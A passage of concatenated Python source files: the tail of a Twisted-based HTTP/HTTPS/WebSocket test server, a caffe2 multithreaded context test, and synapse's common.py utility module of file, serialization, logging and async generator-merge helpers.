yield cb_wrapper
def set_auth(self, path: str, username: str, password: str) -> None:
self.auth[path] = (username, password)
def set_csp(self, path: str, value: str) -> None:
self.csp[path] = value
def reset(self) -> None:
self.request_subscribers.clear()
self.auth.clear()
self.csp.clear()
self.gzip_routes.clear()
self.routes.clear()
def set_route(self, path: str, callback: Callable[[http.Request], Any]) -> None:
self.routes[path] = callback
def enable_gzip(self, path: str) -> None:
self.gzip_routes.add(path)
def set_redirect(self, from_: str, to: str) -> None:
def handle_redirect(request: http.Request) -> None:
request.setResponseCode(HTTPStatus.FOUND)
request.setHeader("location", to)
request.finish()
self.set_route(from_, handle_redirect)
class HTTPServer(Server):
def listen(self, factory: ClientFactory) -> None:
reactor.listenTCP(self.PORT, factory)
class HTTPSServer(Server):
protocol = "https"
def listen(self, factory: ClientFactory) -> None:
cert = ssl.PrivateCertificate.fromCertificateAndKeyPair(
ssl.Certificate.loadPEM(
(_dirname / "testserver" / "cert.pem").read_bytes()
),
ssl.KeyPair.load(
(_dirname / "testserver" / "key.pem").read_bytes(), crypto.FILETYPE_PEM
),
)
contextFactory = cert.options()
reactor.listenSSL(self.PORT, factory, contextFactory)
class WebSocketServerServer(WebSocketServerProtocol):
def __init__(self) -> None:
super().__init__()
self.PORT = find_free_port()
def start(self) -> None:
ws = WebSocketServerFactory("ws://127.0.0.1:" + str(self.PORT))
ws.protocol = WebSocketProtocol
reactor.listenTCP(self.PORT, ws)
class WebSocketProtocol(WebSocketServerProtocol):
def onConnect(self, request: Any) -> None:
pass
def onOpen(self) -> None:
self.sendMessage(b"incoming")
def onMessage(self, payload: bytes, isBinary: bool) -> None:
if payload == b"echo-bin":
self.sendMessage(b"\x04\x02", True)
self.sendClose()
if payload == b"echo-text":
self.sendMessage(b"text", False)
self.sendClose()
if payload == b"close":
self.sendClose()
def onClose(self, wasClean: Any, code: Any, reason: Any) -> None:
pass
class TestServer:
def __init__(self) -> None:
self.server = HTTPServer()
self.https_server = HTTPSServer()
self.ws_server = WebSocketServerServer()
def start(self) -> None:
self.server.start()
self.https_server.start()
self.ws_server.start()
self.thread = threading.Thread(
target=lambda: reactor.run(installSignalHandlers=0)
)
self.thread.start()
def stop(self) -> None:
reactor.stop()
self.thread.join()
def reset(self) -> None:
self.server.reset()
self.https_server.reset()
test_server = TestServer()
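# Hedged usage sketch (added for illustration, not part of the original module):
# start the servers once, register a per-test route, and stop the reactor when
# the suite is done. "/hello" and the handler below are made-up examples.
#
#   test_server.start()
#
#   def hello(request):
#       request.write(b"hi")
#       request.finish()
#   test_server.server.set_route("/hello", hello)
#
#   ...run tests against test_server.server.PREFIX...
#
#   test_server.reset()
#   test_server.stop()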
|
context_test.py
|
from caffe2.python import context, test_util
from threading import Thread
@context.define_context()
class MyContext(object):
pass
class TestContext(test_util.TestCase):
def use_my_context(self):
try:
for _ in range(100):
with MyContext() as a:
for _ in range(100):
self.assertTrue(MyContext.current() == a)
except Exception as e:
self._exceptions.append(e)
def testMultiThreaded(self):
threads = []
self._exceptions = []
for _ in range(8):
thread = Thread(target=self.use_my_context)
thread.start()
threads.append(thread)
for t in threads:
t.join()
for e in self._exceptions:
raise e
@MyContext()
def testDecorator(self):
self.assertIsNotNone(MyContext.current())
|
common.py
|
import io
import os
import ssl
import sys
import json
import stat
import time
import fcntl
import heapq
import types
import base64
import shutil
import struct
import decimal
import fnmatch
import hashlib
import logging
import binascii
import builtins
import tempfile
import warnings
import functools
import itertools
import threading
import traceback
import contextlib
import collections
import yaml
import regex
import synapse.exc as s_exc
import synapse.lib.const as s_const
import synapse.lib.msgpack as s_msgpack
import synapse.lib.structlog as s_structlog
class NoValu:
pass
major = sys.version_info.major
minor = sys.version_info.minor
micro = sys.version_info.micro
majmin = (major, minor)
version = (major, minor, micro)
guidre = regex.compile('^[0-9a-f]{32}$')
buidre = regex.compile('^[0-9a-f]{64}$')
novalu = NoValu()
logger = logging.getLogger(__name__)
def now():
'''
Get the current epoch time in milliseconds.
    This relies on time.time_ns(), which is system-dependent in terms of resolution.
Examples:
Get the current time and make a row for a Cortex::
tick = now()
row = (someiden, 'foo:prop', 1, tick)
core.addRows([row])
Returns:
int: Epoch time in milliseconds.
'''
return time.time_ns() // 1000000
def guid(valu=None):
'''
Get a 16 byte guid value.
By default, this is a random guid value.
Args:
valu: Object used to construct the guid valu from. This must be able
to be msgpack'd.
Returns:
str: 32 character, lowercase ascii string.
'''
if valu is None:
return binascii.hexlify(os.urandom(16)).decode('utf8')
# Generate a "stable" guid from the given item
byts = s_msgpack.en(valu)
return hashlib.md5(byts).hexdigest()
def buid(valu=None):
'''
A binary GUID like sequence of 32 bytes.
Args:
valu (object): Optional, if provided, the hash of the msgpack
encoded form of the object is returned. This can be used to
create stable buids.
Notes:
By default, this returns a random 32 byte value.
Returns:
bytes: A 32 byte value.
'''
if valu is None:
return os.urandom(32)
byts = s_msgpack.en(valu)
return hashlib.sha256(byts).digest()
def ehex(byts):
'''
Encode a bytes variable to a string using binascii.hexlify.
Args:
byts (bytes): Bytes to encode.
Returns:
str: A string representing the bytes.
'''
return binascii.hexlify(byts).decode('utf8')
def uhex(text):
'''
Decode a hex string into bytes.
Args:
text (str): Text to decode.
Returns:
bytes: The decoded bytes.
'''
return binascii.unhexlify(text)
def isguid(text):
return guidre.match(text) is not None
def isbuidhex(text):
return buidre.match(text) is not None
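# Quick illustration (added for clarity, not part of the original source):
# guid() yields a 32 character lowercase hex string and buid() a 32 byte value,
# so both checks below hold:
#   isguid(guid())           # True
#   isbuidhex(ehex(buid()))  # True (64 hex characters)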
def intify(x):
'''
Ensure ( or coerce ) a value into being an integer or None.
Args:
x (obj): An object to intify
Returns:
(int): The int value ( or None )
'''
if isinstance(x, int):
return x
try:
return int(x, 0)
except (TypeError, ValueError):
return None
hugectx = decimal.Context(prec=15)
def hugenum(valu):
'''
Return a decimal.Decimal with proper precision for use as a synapse hugenum.
'''
return decimal.Decimal(valu, context=hugectx)
def vertup(vstr):
'''
Convert a version string to a tuple.
Example:
ver = vertup('1.3.30')
'''
return tuple([int(x) for x in vstr.split('.')])
def todo(_todoname, *args, **kwargs):
'''
Construct and return a todo tuple of (name, args, kwargs).
Note: the odd name for the first parameter is to avoid collision with keys in kwargs.
'''
return (_todoname, args, kwargs)
def tuplify(obj):
'''
Convert a nested set of python primitives into tupleized forms via msgpack.
'''
return s_msgpack.un(s_msgpack.en(obj))
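def _example_todo_tuplify():
    # Illustrative usage sketch (hypothetical helper, not part of the original
    # module): todo() packs a (name, args, kwargs) call spec and tuplify()
    # normalizes nested lists into tuples by round-tripping through msgpack
    # (assuming s_msgpack decodes sequences as tuples, per the docstring above).
    assert todo('doStuff', 1, 2, woot=True) == ('doStuff', (1, 2), {'woot': True})
    assert tuplify(['a', ['b', 'c']]) == ('a', ('b', 'c'))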
def genpath(*paths):
'''
Return an absolute path of the joining of the arguments as path elements
Performs home directory(``~``) and environment variable expansion on the joined path
Args:
*paths ([str,...]): A list of path elements
Note:
All paths used by Synapse operations (i.e. everything but the data) shall use this function or one of its
callers before storing as object properties.
'''
path = os.path.join(*paths)
path = os.path.expanduser(path)
path = os.path.expandvars(path)
return os.path.abspath(path)
def switchext(*paths, ext):
'''
Return an absolute path of the joining of the arguments with the extension replaced.
If an extension does not exist, it will be added.
Args:
*paths ([str,...]): A list of path elements
ext (str): A file extension (e.g. '.txt'). It should begin with a period.
'''
return os.path.splitext(genpath(*paths))[0] + ext
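def _example_paths():
    # Illustrative usage sketch (hypothetical helper, not part of the original
    # module): genpath() expands and absolutizes joined path elements, and
    # switchext() swaps (or adds) the file extension.
    assert os.path.isabs(genpath('~', 'foo', 'bar.txt'))
    assert switchext('/tmp/foo.txt', ext='.yaml') == genpath('/tmp/foo.yaml')
    assert switchext('/tmp/foo', ext='.yaml') == genpath('/tmp/foo.yaml')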
def reqpath(*paths):
'''
Return the absolute path of the joining of the arguments, raising an exception if a file doesn't exist at resulting
path
Args:
*paths ([str,...]): A list of path elements
'''
path = genpath(*paths)
if not os.path.isfile(path):
raise s_exc.NoSuchFile(mesg=f'No such path {path}', path=path)
return path
def reqfile(*paths, **opts):
'''
Return a file at the path resulting from joining of the arguments, raising an exception if the file does not
exist.
Args:
*paths ([str,...]): A list of path elements
**opts: arguments as kwargs to io.open
Returns:
io.BufferedRandom: A file-object which can be read from and written to.
'''
path = genpath(*paths)
if not os.path.isfile(path):
raise s_exc.NoSuchFile(mesg=f'No such file {path}', path=path)
opts.setdefault('mode', 'rb')
return io.open(path, **opts)
def getfile(*paths, **opts):
'''
Return a file at the path resulting from joining of the arguments, or None if the file does not exist.
Args:
*paths ([str,...]): A list of path elements
**opts: arguments as kwargs to io.open
Returns:
io.BufferedRandom: A file-object which can be read from and written to.
'''
path = genpath(*paths)
if not os.path.isfile(path):
return None
opts.setdefault('mode', 'rb')
return io.open(path, **opts)
def getbytes(*paths, **opts):
fd = getfile(*paths, **opts)
if fd is None:
return None
with fd:
return fd.read()
def reqbytes(*paths):
with reqfile(*paths) as fd:
return fd.read()
def genfile(*paths):
'''
Create or open (for read/write) a file path join.
Args:
*paths: A list of paths to join together to make the file.
Notes:
If the file already exists, the fd returned is opened in ``r+b`` mode.
Otherwise, the fd is opened in ``w+b`` mode.
The file position is set to the start of the file. The user is
responsible for truncating (``fd.truncate()``) if the existing file
contents are not desired, or seeking to the end (``fd.seek(0, 2)``)
to append.
Returns:
io.BufferedRandom: A file-object which can be read from and written to.
'''
path = genpath(*paths)
gendir(os.path.dirname(path))
if not os.path.isfile(path):
return io.open(path, 'w+b')
return io.open(path, 'r+b')
@contextlib.contextmanager
def getTempDir():
tempdir = tempfile.mkdtemp()
try:
yield tempdir
finally:
shutil.rmtree(tempdir, ignore_errors=True)
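def _example_genfile():
    # Illustrative usage sketch (hypothetical helper, not part of the original
    # module): genfile() creates missing parent directories, and re-opening an
    # existing file does not truncate it.
    with getTempDir() as dirn:
        with genfile(dirn, 'sub', 'data.bin') as fd:
            fd.write(b'asdf')
        with genfile(dirn, 'sub', 'data.bin') as fd:
            assert fd.read() == b'asdf'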
@contextlib.contextmanager
def lockfile(path):
'''
A file lock with-block helper.
Args:
path (str): A path to a lock file.
Examples:
Get the lock on a file and dostuff while having the lock::
path = '/hehe/haha.lock'
with lockfile(path):
dostuff()
Notes:
This is currently based on fcntl.lockf(), and as such, it is purely
advisory locking. If multiple processes are attempting to obtain a
lock on the same file, this will block until the process which has
the current lock releases it.
Yields:
None
'''
with genfile(path) as fd:
fcntl.lockf(fd, fcntl.LOCK_EX)
yield None
def listdir(*paths, glob=None):
'''
List the (optionally glob filtered) full paths from a dir.
Args:
*paths ([str,...]): A list of path elements
glob (str): An optional fnmatch glob str
'''
path = genpath(*paths)
names = os.listdir(path)
if glob is not None:
names = fnmatch.filter(names, glob)
retn = [os.path.join(path, name) for name in names]
return retn
def gendir(*paths, **opts):
'''
Return the absolute path of the joining of the arguments, creating a directory at the resulting path if one does
not exist.
Performs home directory(~) and environment variable expansion.
Args:
*paths ([str,...]): A list of path elements
**opts: arguments as kwargs to os.makedirs
'''
mode = opts.get('mode', 0o700)
path = genpath(*paths)
if os.path.islink(path):
path = os.readlink(path)
if not os.path.isdir(path):
os.makedirs(path, mode=mode, exist_ok=True)
return path
def reqdir(*paths):
'''
Return the absolute path of the joining of the arguments, raising an exception if a directory does not exist at
the resulting path.
Performs home directory(~) and environment variable expansion.
Args:
*paths ([str,...]): A list of path elements
'''
path = genpath(*paths)
if not os.path.isdir(path):
raise s_exc.NoSuchDir(path=path)
return path
def getDirSize(*paths):
'''
Returns:
Tuple of total real and total apparent size of all normal files and directories underneath *paths plus *paths
itself
Equivalent to `du -B 1 -s` and `du -bs`
Args:
*paths ([str,...]): A list of path elements
'''
def getsize(path):
try:
status = os.lstat(path)
except OSError: # pragma: no cover
return 0, 0
mode = status.st_mode
if not (stat.S_ISREG(mode) or stat.S_ISDIR(mode)):
return 0, 0
return status.st_blocks * 512, status.st_size
realsum, apprsum = getsize(genpath(*paths))
for fpath, dirnames, fnames in os.walk(reqdir(*paths)):
for fname in itertools.chain(fnames, dirnames):
fp = genpath(fpath, fname)
real, appr = getsize(fp)
realsum += real
apprsum += appr
return realsum, apprsum
def jsload(*paths):
with genfile(*paths) as fd:
byts = fd.read()
if not byts:
return None
return json.loads(byts.decode('utf8'))
def jslines(*paths):
with genfile(*paths) as fd:
for line in fd:
yield json.loads(line)
def jssave(js, *paths):
path = genpath(*paths)
with io.open(path, 'wb') as fd:
fd.write(json.dumps(js, sort_keys=True, indent=2).encode('utf8'))
def yamlload(*paths):
path = genpath(*paths)
if not os.path.isfile(path):
return None
with io.open(path, 'rb') as fd:
byts = fd.read()
if not byts:
return None
return yaml.safe_load(byts.decode('utf8'))
def yamlsave(obj, *paths):
path = genpath(*paths)
with genfile(path) as fd:
s = yaml.safe_dump(obj, allow_unicode=False, default_flow_style=False,
default_style='', explicit_start=True, explicit_end=True, sort_keys=True)
fd.truncate(0)
fd.write(s.encode('utf8'))
def yamlmod(obj, *paths):
'''
Load a yaml file (if present), merge obj into it, and save the result. Both obj and the file contents must be maps/dicts or empty.
'''
oldobj = yamlload(*paths)
if obj is not None:
if oldobj:
yamlsave({**oldobj, **obj}, *paths)
else:
yamlsave(obj, *paths)
def verstr(vtup):
'''
Convert a version tuple to a string.
'''
return '.'.join([str(v) for v in vtup])
def excinfo(e):
'''
Populate err,errmsg,errtrace info from exc.
'''
tb = e.__traceback__
path, line, name, sorc = traceback.extract_tb(tb)[-1]
ret = {
'err': e.__class__.__name__,
'errmsg': str(e),
'errfile': path,
'errline': line,
}
if isinstance(e, s_exc.SynErr):
ret['errinfo'] = e.errinfo
return ret
def errinfo(name, mesg):
return {
'err': name,
'errmsg': mesg,
}
def chunks(item, size):
'''
Divide an iterable into chunks.
Args:
item: Item to slice
size (int): Maximum chunk size.
Notes:
This supports Generator objects and objects which support calling
the __getitem__() method with a slice object.
Yields:
Slices of the item containing up to "size" number of items.
'''
# use islice if it's a generator
if isinstance(item, types.GeneratorType):
while True:
chunk = tuple(itertools.islice(item, size))
if not chunk:
return
yield chunk
# The sequence item is empty, so yield an empty slice from it.
# This will also catch mapping objects, since a slice is an
# unhashable key for a mapping, and the __getitem__ method
# is not present on a set object.
if not item:
yield item[0:0]
return
# otherwise, use normal slicing
off = 0
while True:
chunk = item[off:off + size]
if not chunk:
return
yield chunk
off += size
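def _example_chunks():
    # Illustrative usage sketch (hypothetical helper, not part of the original
    # module): chunking a generator yields tuples, while chunking a sequence
    # yields slices of the original sequence type.
    assert list(chunks((i for i in range(5)), 2)) == [(0, 1), (2, 3), (4,)]
    assert list(chunks([0, 1, 2, 3, 4], 2)) == [[0, 1], [2, 3], [4]]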
def iterfd(fd, size=10000000):
'''
Generator which yields bytes from a file descriptor.
Args:
fd (file): A file-like object to read bytes from.
size (int): Size, in bytes, of the number of bytes to read from the
fd at a given time.
Notes:
If the first read call on the file descriptor returns an empty bytestring,
that zero length bytestring will be yielded and the generator will
then be exhausted. This behavior is intended to allow the yielding of
contents of a zero byte file.
Yields:
bytes: Bytes from the file descriptor.
'''
fd.seek(0)
byts = fd.read(size)
# Fast path to yield b''
if len(byts) == 0:
yield byts
return
while byts:
yield byts
byts = fd.read(size)
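def _example_iterfd():
    # Illustrative usage sketch (hypothetical helper, not part of the original
    # module): iterfd() rewinds the fd and yields size-bounded chunks, emitting
    # a single b'' for an empty file.
    assert list(iterfd(io.BytesIO(b'abcdef'), size=4)) == [b'abcd', b'ef']
    assert list(iterfd(io.BytesIO(b''), size=4)) == [b'']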
def spin(genr):
'''
Crank through a generator but discard the yielded values.
Args:
genr: Any generator or iterable valu.
Notes:
This generator is exhausted via the ``collections.deque()``
constructor with ``maxlen=0``, which will quickly exhaust an
iterator staying in C code as much as possible.
Returns:
None
'''
collections.deque(genr, 0)
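def _example_spin():
    # Illustrative usage sketch (hypothetical helper, not part of the original
    # module): spin() exhausts a generator for its side effects and discards
    # the yielded values.
    seen = []
    spin(seen.append(i) or i for i in range(3))
    assert seen == [0, 1, 2]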
async def aspin(genr):
'''
Async version of spin
'''
async for _ in genr:
pass
async def agen(*items):
for item in items:
yield item
def firethread(f):
'''
A decorator for making a function fire a thread.
'''
@functools.wraps(f)
def callmeth(*args, **kwargs):
thr = worker(f, *args, **kwargs)
return thr
return callmeth
def worker(meth, *args, **kwargs):
thr = threading.Thread(target=meth, args=args, kwargs=kwargs)
thr.daemon = True
thr.start()
return thr
sockerrs = (builtins.ConnectionError, builtins.FileNotFoundError)
_Int64be = struct.Struct('>Q')
def int64en(i):
'''
Encode an unsigned 64-bit int into 8 byte big-endian bytes
'''
return _Int64be.pack(i)
def int64un(b):
'''
Decode an unsigned 64-bit int from 8 byte big-endian
'''
return _Int64be.unpack(b)[0]
_SignedInt64be = struct.Struct('>q')
def signedint64en(i):
'''
Encode a signed 64-bit int into 8 byte big-endian bytes
'''
return _SignedInt64be.pack(i)
def signedint64un(b):
'''
Decode a signed 64-bit int from 8 byte big-endian
'''
return _SignedInt64be.unpack(b)[0]
def enbase64(b):
return base64.b64encode(b).decode('utf8')
def debase64(b):
return base64.b64decode(b.encode('utf8'))
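def _example_binary_codecs():
    # Illustrative usage sketch (hypothetical helper, not part of the original
    # module): the int64 helpers are inverse big-endian codecs, and the base64
    # helpers round-trip bytes through a utf8 string.
    assert int64un(int64en(1234567890)) == 1234567890
    assert signedint64un(signedint64en(-5)) == -5
    assert debase64(enbase64(b'woot')) == b'woot'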
def makedirs(path, mode=0o777):
os.makedirs(path, mode=mode, exist_ok=True)
def iterzip(*args, fillvalue=None):
return itertools.zip_longest(*args, fillvalue=fillvalue)
def _getLogConfFromEnv(defval=None, structlog=None):
if structlog:
structlog = 'true'
else:
structlog = 'false'
defval = os.getenv('SYN_LOG_LEVEL', defval)
structlog = envbool('SYN_LOG_STRUCT', structlog)
ret = {'defval': defval, 'structlog': structlog}
return ret
def normLogLevel(valu):
'''
Norm a log level value to a integer.
Args:
valu: The value to norm ( a string or integer ).
Returns:
int: A valid Logging log level.
'''
if isinstance(valu, int):
if valu not in s_const.LOG_LEVEL_INVERSE_CHOICES:
raise s_exc.BadArg(mesg=f'Invalid log level provided: {valu}', valu=valu)
return valu
if isinstance(valu, str):
valu = valu.strip()
try:
valu = int(valu)
except ValueError:
valu = valu.upper()
ret = s_const.LOG_LEVEL_CHOICES.get(valu)
if ret is None:
raise s_exc.BadArg(mesg=f'Invalid log level provided: {valu}', valu=valu) from None
return ret
else:
return normLogLevel(valu)
raise s_exc.BadArg(mesg=f'Unknown log level type: {type(valu)} {valu}', valu=valu)
def setlogging(mlogger, defval=None, structlog=None):
'''
Configure synapse logging.
Args:
mlogger (logging.Logger): Reference to a logging.Logger()
defval (str): Default log level. May be an integer.
Notes:
This calls logging.basicConfig and should only be called once per process.
Returns:
None
'''
ret = _getLogConfFromEnv(defval, structlog)
log_level = ret.get('defval')
log_struct = ret.get('structlog')
if log_level: # pragma: no cover
log_level = normLogLevel(log_level)
if log_struct:
handler = logging.StreamHandler()
formatter = s_structlog.JsonFormatter()
handler.setFormatter(formatter)
logging.basicConfig(level=log_level, handlers=(handler,))
else:
logging.basicConfig(level=log_level, format=s_const.LOG_FORMAT)
mlogger.info('log level set to %s', s_const.LOG_LEVEL_INVERSE_CHOICES.get(log_level))
return ret
syndir = os.getenv('SYN_DIR')
if syndir is None:
syndir = '~/.syn'
def envbool(name, defval='false'):
'''
Resolve an environment variable to a boolean value.
Args:
name (str): Environment variable to resolve.
defval (str): Default string value to resolve as.
Notes:
Values are lower-cased; only the strings "0" and "false" are treated as False.
Returns:
boolean: False if the resolved value is "0" or "false", True otherwise.
'''
return os.getenv(name, defval).lower() not in ('0', 'false')
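def _example_envbool():
    # Illustrative usage sketch (hypothetical helper and env var names, not part
    # of the original module): only "0" and "false" (case-insensitive) resolve
    # to False; anything else, including the default, resolves to True.
    os.environ['_SYN_EXAMPLE_FLAG'] = 'False'
    assert envbool('_SYN_EXAMPLE_FLAG') is False
    os.environ['_SYN_EXAMPLE_FLAG'] = 'yes'
    assert envbool('_SYN_EXAMPLE_FLAG') is True
    assert envbool('_SYN_EXAMPLE_UNSET', defval='true') is True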
def getSynPath(*paths):
return genpath(syndir, *paths)
def getSynDir(*paths):
return gendir(syndir, *paths)
def result(retn):
'''
Return a value or raise an exception from a retn tuple.
'''
ok, valu = retn
if ok:
return valu
name, info = valu
ctor = getattr(s_exc, name, None)
if ctor is not None:
raise ctor(**info)
info['errx'] = name
raise s_exc.SynErr(**info)
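def _example_result():
    # Illustrative usage sketch (hypothetical helper, not part of the original
    # module; assumes SynErr keeps its kwargs on .errinfo, as excinfo() above
    # suggests): result() returns the value on success and raises the named
    # s_exc exception on failure.
    assert result((True, 'woot')) == 'woot'
    try:
        result((False, ('NoSuchFile', {'mesg': 'gone', 'path': '/tmp/missing'})))
    except s_exc.NoSuchFile as e:
        assert e.errinfo.get('path') == '/tmp/missing'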
def err(e, fulltb=False):
name = e.__class__.__name__
info = {}
tb = sys.exc_info()[2]
tbinfo = traceback.extract_tb(tb)
if tbinfo:
path, line, tbname, src = tbinfo[-1]
path = os.path.basename(path)
info = {
'efile': path,
'eline': line,
'esrc': src,
'ename': tbname,
}
if isinstance(e, s_exc.SynErr):
info.update(e.items())
else:
info['mesg'] = str(e)
if fulltb:
s = traceback.format_exc()
if s[-1:] == "\n":
s = s[:-1]
info['etb'] = s
return (name, info)
def retnexc(e):
'''
Construct a retn tuple for the given exception.
'''
return (False, err(e))
def config(conf, confdefs):
'''
Initialize a config dict using the given confdef tuples.
'''
conf = conf.copy()
# for now just populate defval
for name, info in confdefs:
conf.setdefault(name, info.get('defval'))
return conf
def deprecated(name, curv='2.x', eolv='3.0.0'):
mesg = f'"{name}" is deprecated in {curv} and will be removed in {eolv}'
warnings.warn(mesg, DeprecationWarning)
def reqjsonsafe(item):
'''
Returns None if item is json serializable, otherwise raises an exception
'''
try:
json.dumps(item)
except TypeError as e:
raise s_exc.MustBeJsonSafe(mesg=str(e)) from None
def jsonsafe_nodeedits(nodeedits):
'''
Hexlify the buid of each nodeedit.
'''
retn = []
for nodeedit in nodeedits:
newedit = (ehex(nodeedit[0]), *nodeedit[1:])
retn.append(newedit)
return retn
def unjsonsafe_nodeedits(nodeedits):
retn = []
for nodeedit in nodeedits:
buid = nodeedit[0]
if isinstance(buid, str):
newedit = (uhex(buid), *nodeedit[1:])
else:
newedit = nodeedit
retn.append(newedit)
return retn
async def merggenr(genrs, cmprkey):
'''
Iterate multiple sorted async generators and yield their results in order.
Args:
genrs (Sequence[AsyncGenerator[T]]): a sequence of async generator that each yield sorted items
cmprkey(Callable[T, T, bool]): a comparison function over the items yielded
Note:
If the genrs yield increasing items, cmprkey should return True if the first parameter is less
than the second parameter, e.g. ``lambda x, y: x < y``.
'''
size = len(genrs)
genrs = list(genrs)
indxs = list(range(size))
async def genrnext(g):
try:
ret = await g.__anext__()
return ret
except StopAsyncIteration:
return novalu
curvs = [await genrnext(g) for g in genrs]
while True:
nextindx = None
nextvalu = novalu
toremove = []
for i in indxs:
curv = curvs[i]
if curv is novalu:
toremove.append(i)
continue
# in the case where we're the first, initialize...
if nextvalu is novalu:
nextindx = i
nextvalu = curv
continue
if cmprkey(curv, nextvalu):
nextindx = i
nextvalu = curv
# check if we're done
if nextvalu is novalu:
return
# Remove spent genrs
for i in toremove:
indxs.remove(i)
yield nextvalu
curvs[nextindx] = await genrnext(genrs[nextindx])
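async def _example_merggenr():
    # Illustrative usage sketch (hypothetical helper, not part of the original
    # module): merging two sorted async generators yields one sorted stream.
    async def nums(*vals):
        for valu in vals:
            yield valu
    genrs = (nums(1, 3, 5), nums(2, 4, 6))
    retn = [valu async for valu in merggenr(genrs, lambda x, y: x < y)]
    assert retn == [1, 2, 3, 4, 5, 6]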
async def merggenr2(genrs, cmprkey=None, reverse=False):
'''
Optimized version of merggenr based on heapq.merge
'''
h = []
h_append = h.append
if reverse:
_heapify = heapq._heapify_max
_heappop = heapq._heappop_max
_heapreplace = heapq._heapreplace_max
direction = -1
else:
_heapify = heapq.heapify
_heappop = heapq.heappop
_heapreplace = heapq.heapreplace
direction = 1
if cmprkey is None:
for order, genr in enumerate(genrs):
try:
nxt = genr.__anext__
h_append([await nxt(), order * direction, nxt])
except StopAsyncIteration:
pass
_heapify(h)
while len(h) > 1:
try:
while True:
valu, _, nxt = s = h[0]
yield valu
s[0] = await nxt()
_heapreplace(h, s)
except StopAsyncIteration:
_heappop(h)
if h:
valu, order, _ = h[0]
yield valu
async for valu in genrs[abs(order)]:
yield valu
return
for order, genr in enumerate(genrs):
try:
nxt = genr.__anext__
valu = await nxt()
h_append([cmprkey(valu), order * direction, valu, nxt])
except StopAsyncIteration:
pass
_heapify(h)
while len(h) > 1:
try:
while True:
_, _, valu, nxt = s = h[0]
yield valu
valu = await nxt()
s[0] = cmprkey(valu)
s[2] = valu
_heapreplace(h, s)
except StopAsyncIteration:
_heappop(h)
if h:
_, order, valu, _ = h[0]
yield valu
async for valu in genrs[abs(order)]:
yield valu
def getSslCtx(cadir, purpose=ssl.Purpose.SERVER_AUTH):
'''
Create an SSL Context and load certificates from a given directory.
Args:
cadir (str): Path to load certificates from.
purpose: SSLContext purposes flags.
Returns:
ssl.SSLContext: An SSL Context object.
'''
sslctx = ssl.create_default_context(purpose=purpose)
for name in os.listdir(cadir):
certpath = os.path.join(cadir, name)
try:
sslctx.load_verify_locations(cafile=certpath)
except Exception: # pragma: no cover
logger.exception(f'Error loading {certpath}')
return sslctx
# TODO: Remove when this is added to contextlib in py 3.10
class aclosing(contextlib.AbstractAsyncContextManager):
"""Async context manager for safely finalizing an asynchronously cleaned-up
resource such as an async generator, calling its ``aclose()`` method.
Code like this:
async with aclosing(<module>.fetch(<arguments>)) as agen:
<block>
is equivalent to this:
agen = <module>.fetch(<arguments>)
try:
<block>
finally:
await agen.aclose()
"""
def __init__(self, thing):
self.thing = thing
async def __aenter__(self):
return self.thing
async def __aexit__(self, exc, cls, tb):
await self.thing.aclose()
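async def _example_aclosing():
    # Illustrative usage sketch (hypothetical helper, not part of the original
    # module): aclosing() guarantees the wrapped async generator's aclose()
    # runs even when the consumer breaks out of the block early.
    closed = []
    async def genr():
        try:
            yield 1
            yield 2
        finally:
            closed.append(True)
    async with aclosing(genr()) as agen:
        async for _ in agen:
            break
    assert closed == [True]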
|